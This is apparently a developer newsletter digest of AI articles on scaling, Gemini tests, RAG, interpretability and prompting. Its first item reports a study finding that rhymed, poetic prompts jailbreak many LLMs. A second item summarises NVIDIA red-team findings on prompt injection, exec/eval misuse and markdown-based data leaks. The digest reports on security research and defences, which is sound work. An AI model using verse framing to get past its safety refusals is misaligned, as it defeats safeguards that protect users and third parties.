| |
| 🔗 Stories, Tutorials & Articles |
| |
|
| |
| Roses are red, violets are blue, if you phrase it as poem, any jailbreak will do |
| |
| |
A new study just broke the safety game wide open: rhymed prompts slipped past filters in 25 major LLMs, including Gemini 2.5 Pro and Deepseek - with up to 100% success. No clever chaining, no jailbreak soup. Just single-shot rhyme.
Turns out, poetic language isn’t just for bard-core Twitter. When it comes to triggering unsafe outputs, especially around cyberattacks or data leaks, rhymes triple success rates compared to plain prose. |
|
| |
|
| |
|
| |
| Practical LLM Security Advice from the NVIDIA AI Red Team |
| |
| |
NVIDIA’s AI Red Team nailed three security sinkholes in LLMs: reckless use of exec/eval, RAG pipelines that grab too much data, and markdown that doesn't get cleaned. These cracks open doors to remote code execution, sneaky prompt injection, and link-based data leaks.
The fix-it trend: App security’s leaning hard into sandboxed runtimes, tighter data perms, and markdown that can’t stab you. |
|
| |
|
| |
|
| |
| A trillion dollars is a terrible thing to waste |
| |
| |
OpenAI co-founder Ilya Sutskever just said the quiet part out loud: scaling laws are breaking down. Bigger models aren’t getting better at thinking, they’re getting worse at generalizing and reasoning.
Now he’s eyeing neurosymbolic AI and innate inductive constraints. Yep, the “just make it huge” era might be over. |
|
| |
|
| |
|
| |
| Google tests new Gemini 3 models on LM Arena |
| |
| |
| Google’s been quietly field-testing two shadow models, Fierce Falcon and Ghost Falcon, on LM Arena. Early signs? They're probably warm-ups for the next Gemini 3 Flash or Pro drop. Classic Google move: float a checkpoint, stir up curiosity, then go GA. |
|
| |
|
| |
|
| |
| Prompts for Open Problems |
| |
| |
| The author, Ben Recht, proposes five research directions inspired by his graduate machine learning class, arguing for different research rather than just more. These prompts include adopting a design-based view for decision theory, explaining the robust scaling trends in competitive testing, and moving beyond average case evaluation. Crucially, he calls for optimization innovations to improve LLM reasoning efficiency and views the development of high-performing open-source, open-corpus language models requiring minimal compute as the most vital applied problem. |
|
| |
|
| |
|
| |
| 200k Tokens Is Plenty |
| |
| |
Amp’s team isn’t chasing token limits. Even with ~200k available via Opus 4.5, they stick to short, modular threads, around 80k tokens each.
Why? Smaller threads are cheaper, more stable, and just work better. Instead of stuffing everything into a single mega-context, they slice big tasks into focused pieces. Cleaner scope, faster runs, fewer surprises. |
|
| |
|
| |
|
| |
| Learning Collatz - The Mother of all Rabbit Holes |
| |
| |
| Researchers trained small transformer models to predict the "long Collatz step," an arithmetic rule for the infamous unsolved Collatz conjecture, achieving surprisingly high accuracy up to 99.8%. The models did not learn the universal algorithm, but instead showed quantized learning, mastering specific input classes defined by their binary structure. Error analysis revealed that mistakes were systematic and explainable by simple rules, demonstrating that transformers can learn complex arithmetic functions by focusing on special cases rather than hallucinating. This study provides a new method for AI interpretability by leveraging the known mathematical structure of the problem to analyze the model's learning process. |
|
| |
|
| |
|
| |
| So you wanna build a local RAG? |
| |
| |
| Skald spun up a full local RAG stack, with pgvector, Sentence Transformers, Docling, and llama.cpp, in under 10 minutes. The thing hums on English point queries. Benchmarks show open-source models and rerankers can go toe-to-toe with SaaS tools in most tasks. They stumble, though, on multilingual prompts and cross-doc mashups. |
|
| |
|
| |
|
| |
| How to Create an Effective Prompt for Nano Banana Pro |
| |
| |
| The author details how to effectively prompt Google’s Nano Banana Pro, a visual reasoning model, emphasizing that success relies on structured design documents rather than vague requests. The method prioritizes four key steps: defining the Work Surface (e.g., dashboard or comic), specifying the precise Layout, listing all required Components, and enforcing strict Constraints to maintain consistency. This approach leverages the model's distinct engines (like Layout, Typography, and Style) to create complex, structurally coherent visual artifacts, proven through an ambitious comic book adaptation project. |
|
| |
|
| |
👉 Got something to share? Create your FAUN Page and start publishing your blog posts, tools, and updates. Grow your audience, and get discovered by the developer community. |